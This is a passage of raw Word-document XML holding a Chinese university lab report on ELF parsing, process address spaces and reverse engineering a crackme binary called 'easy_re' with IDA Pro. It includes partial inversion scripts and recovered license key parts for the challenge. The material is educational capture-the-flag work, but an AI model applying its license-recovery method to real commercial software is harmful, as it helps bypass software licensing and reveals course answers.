          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="1966360F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握Linux进程的原理；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B51A34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解ELF可执行文件格式与载入原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>理；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6000C0E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握知名反汇编工具的工作原理与使用方法；</w:t>
      </w:r>
      <w:r>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F8389D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc1545948537"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6116EDB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写代码独立解析ELF文件，获取ELF文件元信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3D6FAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需独立使用进程分析工具分析给定ELF的进程地址空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF03788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以小组为单位完成对ELF程序的逆向分析后获取flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA62EA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc287197033"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="2CB0E972">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验平台：pwn.hust.college</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734715EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统：Ubuntu 20.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F978F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分析工具：IDA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E42C85F">
      <w:pPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="900"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA64931">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc1706758085"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="544D981B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425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获取ELF文件元信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8E34B9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="30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使用Python语言struct模块，根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>elf.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>头文件构造python struct结构体，使用结构体格式化解析ELF文件比特流，获取ELF文件的详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B0D27E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="30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首先根据ELF文件头的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字段识别ELF文件为32位或64位文件，再用对应的ELF头结构体解析ELF头，获取ELF文件的入口地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，程序段表偏移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_phoff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，程序节表偏移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_shoff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，段数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_phnum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和节数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_shnum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B384B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="30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根据程序段表偏移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_phoff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和段数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_phnum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>遍历段表，使用段表结构体解析段表数据，获取段的文件偏移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，段加载虚拟地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p_vaddr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，段在文件中的长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p_filesz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和段在内存中的长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p_memsz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5ECA74">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="30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根据程序解节表偏移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_shoff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和节数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e_shnum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>遍历节表，使用节表结构体解析节表数据，获取节的名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，节虚拟地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh_addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，节在文件中的偏移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，节的长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh_size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>等信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9E547">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="30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ELF文件easy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解析结构如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E98D42">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334635" cy="1632585"/>
            <wp:effectExtent l="9525" t="9525" r="2794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1632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8FBC12">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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1-1 ELF头解析结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386B80F9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5337810" cy="1576705"/>
            <wp:effectExtent l="9525" t="9525" r="2476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1576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82024E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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1-2 段表解析结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C049E86">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5345430" cy="2063115"/>
            <wp:effectExtent l="9525" t="9525" r="17145" b="228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20631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5CB608">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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1-3 节表解析结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D819DEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425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查看ELF可执行文件进程地址空间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF83BDC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="30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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/proc/$PID/maps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件可获取进程运行的地址空间，如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1-4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDAFAA0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5345430" cy="2146935"/>
            <wp:effectExtent l="9525" t="9525" r="1714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2146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D633FA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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图1-4 查看ELF地址空间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3142AEF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:firstLine="42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根据图可以得知程序加载基地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x00400000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，libc库加载地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7f94a1bf5000。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACDFD16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425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逆向分析程序license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4EC3B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="30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使用IDA Pro加载easy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件，定位main函数使用F5反编译程序。分析程序逻辑可知，程序将输入license使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’-’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字符进行分隔，第一部分4个字节与字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’DiQJ’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行比较，第二部分4个字节进行移位与异或运算后与字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’xw0t’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行比较，第三部分4个字节进行部分复杂运算后与字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’pL97’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行比较，第四部分4个字节计算md5值后将md5后四个字节与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’\xec\xcf\xb5\x19’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行比较（如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5所示）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BA340">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto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根据第二部分校验写出第二部分逆运算脚本，得到第二部分license为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’xTpH’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767E6AB4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# 第二部分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43A38FF7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c0 = table.index(part2[0]) &lt;&lt; 2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188079B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c1 = (table.index(part2[1]) ^ (c0 &gt;&gt; 2)) &lt;&lt; 2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA3311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c2 = (table.index(part2[2]) ^ (c1 &gt;&gt; 2)) &lt;&lt; 2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF0570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c3 = (table.index(part2[3]) ^ (c2 &gt;&gt; 2)) &lt;&lt; 2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7EABB1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743CB788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part2 = chr(c0) + chr(c1) + chr(c2) + chr(c3) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F2B12">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="30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根据第三部分校验写出第三部分逆运算脚本，得到第三部分license为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’OR06’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29484945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# 第三部分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7616BB8E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table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"1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFHJKLZXCVBNM-+/"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334A285F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d0 = table.index(part3[0])  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996C489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d1 = table.index(part3[1])  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7A02BA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d2 = table.index(part3[2])  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10506075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d3 = table.index(part3[3])  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9175F0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c0 = (d0 &lt;&lt; 2) &amp; 0x7F  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586E0F4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c0 = c0 | (d1 &gt;&gt; 4)  </w:t>
      </w:r>
    </w:p>
